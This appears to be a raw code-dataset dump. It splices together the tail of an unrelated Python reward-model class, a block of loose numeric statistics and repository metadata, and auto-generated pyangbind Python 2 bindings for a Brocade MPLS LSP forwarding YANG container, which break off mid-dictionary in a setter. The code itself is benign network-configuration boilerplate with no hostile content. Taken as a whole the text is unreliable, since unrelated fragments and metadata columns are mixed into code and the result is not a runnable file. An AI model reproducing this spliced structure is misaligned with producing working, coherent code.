def get_reward(self, state, action, format="torch"):
reward = self.forward(state, action)
if format == "torch":
return reward
else:
return reward.cpu().detach().numpy()
def to(self, device):
super().to(device)
self.nn_params.device = device
| 33.93299
| 138
| 0.624032
| 1,791
| 13,166
| 4.338358
| 0.07761
| 0.085457
| 0.120463
| 0.053282
| 0.854183
| 0.827799
| 0.8139
| 0.807851
| 0.796268
| 0.77323
| 0
| 0.004447
| 0.265532
| 13,166
| 388
| 139
| 33.93299
| 0.799069
| 0.024837
| 0
| 0.671642
| 0
| 0
| 0.005692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078358
| false
| 0
| 0.022388
| 0
| 0.182836
| 0.003731
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
be19caf7ce72c7126af2c7ad4d3b927197d2bce5
| 44,176
|
py
|
Python
|
pybind/slxos/v16r_1_00b/mpls_state/lsp/forwarding/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/mpls_state/lsp/forwarding/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/mpls_state/lsp/forwarding/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class forwarding(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/lsp/forwarding. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: MPLS LSP forwarding information
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__tunnel_vif_index','__lsp_id','__forwarding_up','__primary_active','__primary_up','__secondary_active','__secondary_up','__selected_secondary_active','__selected_secondary_up','__frr_active','__frr_up','__instance_id','__out_port_id','__out_port_name','__out_label',)
_yang_name = 'forwarding'
_rest_name = 'forwarding'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__selected_secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__tunnel_vif_index = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__out_port_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__selected_secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__out_label = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__forwarding_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__instance_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__primary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__out_port_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__primary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__lsp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__frr_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
self.__frr_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
    """Return the YANG schema path of this container as a list of names.

    When this node is attached to a parent, the path is the parent's path
    extended with this node's YANG name; otherwise the absolute default
    path for this container is returned.
    """
    if not hasattr(self, "_parent"):
        # Detached node: fall back to the schema-defined absolute path.
        return [u'mpls-state', u'lsp', u'forwarding']
    return self._parent._path() + [self._yang_name]
def _rest_path(self):
    """Return the REST API path of this container as a list of names.

    Mirrors ``_path`` but uses REST names; a node with an empty
    ``_rest_name`` is transparent and contributes no path segment.
    """
    if not hasattr(self, "_parent"):
        # Detached node: fall back to the schema-defined absolute path.
        return [u'mpls-state', u'lsp', u'forwarding']
    base = self._parent._rest_path()
    if self._rest_name:
        return base + [self._rest_name]
    return base
def _get_tunnel_vif_index(self):
    """
    Getter method for tunnel_vif_index, mapped from YANG variable /mpls_state/lsp/forwarding/tunnel_vif_index (uint32)

    YANG Description: lsp tunnel vif index

    Returns the YANGDynClass-wrapped uint32 leaf value.
    """
    return self.__tunnel_vif_index
def _set_tunnel_vif_index(self, v, load=False):
    """
    Setter method for tunnel_vif_index, mapped from YANG variable /mpls_state/lsp/forwarding/tunnel_vif_index (uint32)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_tunnel_vif_index is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_tunnel_vif_index() directly.

    YANG Description: lsp tunnel vif index

    Raises ValueError when v is not compatible with uint32.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap against the uint32 restriction (0..4294967295).
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """tunnel_vif_index must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
        })
    self.__tunnel_vif_index = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_tunnel_vif_index(self):
    # Reset tunnel_vif_index to a fresh, default-constructed uint32 leaf.
    self.__tunnel_vif_index = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tunnel-vif-index", rest_name="tunnel-vif-index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_lsp_id(self):
    """
    Getter method for lsp_id, mapped from YANG variable /mpls_state/lsp/forwarding/lsp_id (uint32)

    YANG Description: lsp_forwarding_lsp_id

    Returns the YANGDynClass-wrapped uint32 leaf value.
    """
    return self.__lsp_id
def _set_lsp_id(self, v, load=False):
    """
    Setter method for lsp_id, mapped from YANG variable /mpls_state/lsp/forwarding/lsp_id (uint32)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_lsp_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_lsp_id() directly.

    YANG Description: lsp_forwarding_lsp_id

    Raises ValueError when v is not compatible with uint32.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap against the uint32 restriction (0..4294967295).
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """lsp_id must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
        })
    self.__lsp_id = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_lsp_id(self):
    # Reset lsp_id to a fresh, default-constructed uint32 leaf.
    self.__lsp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-id", rest_name="lsp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_forwarding_up(self):
    """
    Getter method for forwarding_up, mapped from YANG variable /mpls_state/lsp/forwarding/forwarding_up (boolean)

    YANG Description: lsp_forwarding_up

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__forwarding_up
def _set_forwarding_up(self, v, load=False):
    """
    Setter method for forwarding_up, mapped from YANG variable /mpls_state/lsp/forwarding/forwarding_up (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_forwarding_up is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_forwarding_up() directly.

    YANG Description: lsp_forwarding_up

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """forwarding_up must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__forwarding_up = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_forwarding_up(self):
    # Reset forwarding_up to a fresh, default-constructed boolean leaf.
    self.__forwarding_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="forwarding-up", rest_name="forwarding-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_primary_active(self):
    """
    Getter method for primary_active, mapped from YANG variable /mpls_state/lsp/forwarding/primary_active (boolean)

    YANG Description: lsp_forwarding_primary_active

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__primary_active
def _set_primary_active(self, v, load=False):
    """
    Setter method for primary_active, mapped from YANG variable /mpls_state/lsp/forwarding/primary_active (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_primary_active is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_primary_active() directly.

    YANG Description: lsp_forwarding_primary_active

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """primary_active must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__primary_active = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_primary_active(self):
    # Reset primary_active to a fresh, default-constructed boolean leaf.
    self.__primary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-active", rest_name="primary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_primary_up(self):
    """
    Getter method for primary_up, mapped from YANG variable /mpls_state/lsp/forwarding/primary_up (boolean)

    YANG Description: lsp_forwarding_primary_up

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__primary_up
def _set_primary_up(self, v, load=False):
    """
    Setter method for primary_up, mapped from YANG variable /mpls_state/lsp/forwarding/primary_up (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_primary_up is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_primary_up() directly.

    YANG Description: lsp_forwarding_primary_up

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """primary_up must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__primary_up = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_primary_up(self):
    # Reset primary_up to a fresh, default-constructed boolean leaf.
    self.__primary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="primary-up", rest_name="primary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_secondary_active(self):
    """
    Getter method for secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_active (boolean)

    YANG Description: lsp_forwarding_secondary_active

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__secondary_active
def _set_secondary_active(self, v, load=False):
    """
    Setter method for secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_active (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_secondary_active is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_secondary_active() directly.

    YANG Description: lsp_forwarding_secondary_active

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """secondary_active must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__secondary_active = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_secondary_active(self):
    # Reset secondary_active to a fresh, default-constructed boolean leaf.
    self.__secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-active", rest_name="secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_secondary_up(self):
    """
    Getter method for secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_up (boolean)

    YANG Description: lsp_forwarding_secondary_up

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__secondary_up
def _set_secondary_up(self, v, load=False):
    """
    Setter method for secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/secondary_up (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_secondary_up is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_secondary_up() directly.

    YANG Description: lsp_forwarding_secondary_up

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """secondary_up must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__secondary_up = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_secondary_up(self):
    # Reset secondary_up to a fresh, default-constructed boolean leaf.
    self.__secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secondary-up", rest_name="secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_selected_secondary_active(self):
    """
    Getter method for selected_secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_active (boolean)

    YANG Description: lsp_forwarding_selected_secondary_active

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__selected_secondary_active
def _set_selected_secondary_active(self, v, load=False):
    """
    Setter method for selected_secondary_active, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_active (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_selected_secondary_active is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_selected_secondary_active() directly.

    YANG Description: lsp_forwarding_selected_secondary_active

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """selected_secondary_active must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__selected_secondary_active = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_selected_secondary_active(self):
    # Reset selected_secondary_active to a fresh, default-constructed boolean leaf.
    self.__selected_secondary_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-active", rest_name="selected-secondary-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_selected_secondary_up(self):
    """
    Getter method for selected_secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_up (boolean)

    YANG Description: lsp_forwarding_selected_secondary_up

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__selected_secondary_up
def _set_selected_secondary_up(self, v, load=False):
    """
    Setter method for selected_secondary_up, mapped from YANG variable /mpls_state/lsp/forwarding/selected_secondary_up (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_selected_secondary_up is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_selected_secondary_up() directly.

    YANG Description: lsp_forwarding_selected_secondary_up

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """selected_secondary_up must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__selected_secondary_up = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_selected_secondary_up(self):
    # Reset selected_secondary_up to a fresh, default-constructed boolean leaf.
    self.__selected_secondary_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="selected-secondary-up", rest_name="selected-secondary-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_frr_active(self):
    """
    Getter method for frr_active, mapped from YANG variable /mpls_state/lsp/forwarding/frr_active (boolean)

    YANG Description: lsp_forwarding_frr_active

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__frr_active
def _set_frr_active(self, v, load=False):
    """
    Setter method for frr_active, mapped from YANG variable /mpls_state/lsp/forwarding/frr_active (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_frr_active is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_frr_active() directly.

    YANG Description: lsp_forwarding_frr_active

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """frr_active must be of a type compatible with boolean""",
            'defined-type': "boolean",
